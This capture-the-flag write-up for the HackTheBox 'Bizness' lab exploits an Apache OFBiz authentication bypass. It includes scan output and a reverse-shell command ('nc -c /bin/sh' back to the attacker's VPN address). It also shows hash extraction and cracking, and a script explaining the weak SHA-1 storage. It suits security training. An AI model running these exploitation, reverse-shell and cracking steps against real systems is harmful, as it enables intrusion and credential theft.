
HackTheBox Bizness Writeup

Explore the fundamentals of cybersecurity in the Bizness Capture The Flag (CTF) challenge, an easy-level box. This straightforward CTF writeup walks through the key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.11.252 bizness.htb

Script to add hosts automatically

# Target IP and hostname for this box
ip="10.10.11.252"
domain="bizness.htb"
# Append the entry only if an identical line is not already present
grep -qF "$ip $domain" /etc/hosts || printf '%s %s\n' "$ip" "$domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV bizness.htb
Nmap scan report for bizness.htb (10.10.11.252)
Host is up (0.051s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp  open  http     nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
443/tcp open  ssl/http nginx 1.18.0
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after:  2328-11-10T20:03:40
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.18.0
| tls-nextprotoneg: 
|_  http/1.1
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
dirb 'https://bizness.htb/'

https://bizness.htb/accounting/control/main

The page footer identifies the application: "Powered by Apache OFBiz. Release 18".

CVE-2023-51467 and CVE-2023-49070

nc -lvnp 9001
# Fetch the public PoC for the authentication bypass
git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass
cd Apache-OFBiz-Authentication-Bypass
# Read the IPv4 address of the VPN interface (tun0) so the callback reaches us
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
# Trigger the payload; it connects back to the listener started above on port 9001
python exploit.py --url 'https://bizness.htb' --cmd "nc -c /bin/sh $vpnip 9001"

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

export TERM=xterm

cat /home/ofbiz/user.txt
grep --binary-files=text -rni 'currentpassword' /opt/ofbiz/runtime
git clone https://github.com/duck-sec/Apache-OFBiz-SHA1-Cracker
cd Apache-OFBiz-SHA1-Cracker
python OFBiz-crack.py --hash-string '$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I' --wordlist '/usr/share/dict/rockyou.txt'

This yields the password monkeybizness.
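To see why the hash recovered from the runtime directory falls so quickly, it helps to look at the storage format itself. The script below is an added example for this writeup, not code from the box or from the OFBiz project; it parses the `$hashType$salt$digest` layout of the stored value, checks one candidate password against it, and reports the properties that make offline guessing cheap (a fast single-iteration digest and a one-character salt). It assumes the OFBiz HashCrypt scheme as I understand it: the digest is the named algorithm applied to the salt bytes followed by the password bytes, encoded as URL-safe Base64 with padding stripped. The constructed salts and passwords used in the self-check are made up for the example.

```python
"""Parse and verify Apache OFBiz stored password hashes.

Added example, not part of the original writeup or of OFBiz itself.
Assumed format (OFBiz HashCrypt): "$" + hashType + "$" + salt + "$" +
urlsafe_base64(hashType(salt_bytes || password_bytes)) without padding.
"""
from __future__ import annotations

import base64
import hashlib
import hmac
from typing import List, NamedTuple

# Java MessageDigest names seen in OFBiz hashes -> hashlib constructors
# (assumed mapping; "SHA" is Java's name for SHA-1).
_ALGOS = {
    "SHA": hashlib.sha1,
    "SHA-1": hashlib.sha1,
    "SHA-256": hashlib.sha256,
    "SHA-512": hashlib.sha512,
    "MD5": hashlib.md5,
}

# Hash string found on the box (from the writeup).
PAGE_HASH = "$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I"


class OfbizHash(NamedTuple):
    hash_type: str
    salt: str
    digest: bytes


def parse_ofbiz_hash(stored: str) -> OfbizHash:
    """Split "$type$salt$digest" and decode the URL-safe Base64 digest."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "" or not parts[1] or not parts[3]:
        raise ValueError("malformed OFBiz hash")
    _, hash_type, salt, b64 = parts
    if hash_type not in _ALGOS:
        raise ValueError(f"unsupported hash type {hash_type!r}")
    # OFBiz strips the '=' padding; restore it before decoding.
    digest = base64.urlsafe_b64decode(b64 + "=" * (-len(b64) % 4))
    if len(digest) != _ALGOS[hash_type]().digest_size:
        raise ValueError("digest length does not match hash type")
    return OfbizHash(hash_type, salt, digest)


def ofbiz_digest(hash_type: str, salt: str, password: str) -> bytes:
    """Digest over salt bytes followed by password bytes (assumed scheme)."""
    h = _ALGOS[hash_type]()
    h.update(salt.encode("utf-8"))
    h.update(password.encode("utf-8"))
    return h.digest()


def make_ofbiz_hash(hash_type: str, salt: str, password: str) -> str:
    """Produce a stored value in the same layout, for round-trip checks."""
    raw = ofbiz_digest(hash_type, salt, password)
    b64 = base64.urlsafe_b64encode(raw).decode("ascii").rstrip("=")
    return f"${hash_type}${salt}${b64}"


def verify_ofbiz_password(stored: str, candidate: str) -> bool:
    """Constant-time comparison of one candidate against a stored hash."""
    parsed = parse_ofbiz_hash(stored)
    expected = ofbiz_digest(parsed.hash_type, parsed.salt, candidate)
    return hmac.compare_digest(parsed.digest, expected)


def weakness_notes(stored: str) -> List[str]:
    """Explain what makes a stored value cheap to attack offline."""
    p = parse_ofbiz_hash(stored)
    notes = []
    if p.hash_type in ("SHA", "SHA-1", "MD5"):
        notes.append(f"{p.hash_type} is a fast single-iteration digest with no work factor")
    if len(p.salt) < 8:
        notes.append(f"salt {p.salt!r} is only {len(p.salt)} character(s) long")
    return notes


if __name__ == "__main__":
    parsed = parse_ofbiz_hash(PAGE_HASH)
    print("type:", parsed.hash_type, "salt:", parsed.salt, "digest bytes:", len(parsed.digest))
    for note in weakness_notes(PAGE_HASH):
        print("weakness:", note)
    # Under the assumed scheme this reproduces the writeup's result.
    print("monkeybizness matches:", verify_ofbiz_password(PAGE_HASH, "monkeybizness"))
```

The notes the script prints are the defensive takeaway: a one-character salt offers no protection against precomputation, and SHA-1 with no iteration count lets a wordlist be tried at full hardware speed, which is exactly why a short dictionary run succeeds against it.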

su
cat /root/root.txt
This post is licensed under CC BY 4.0 by the author.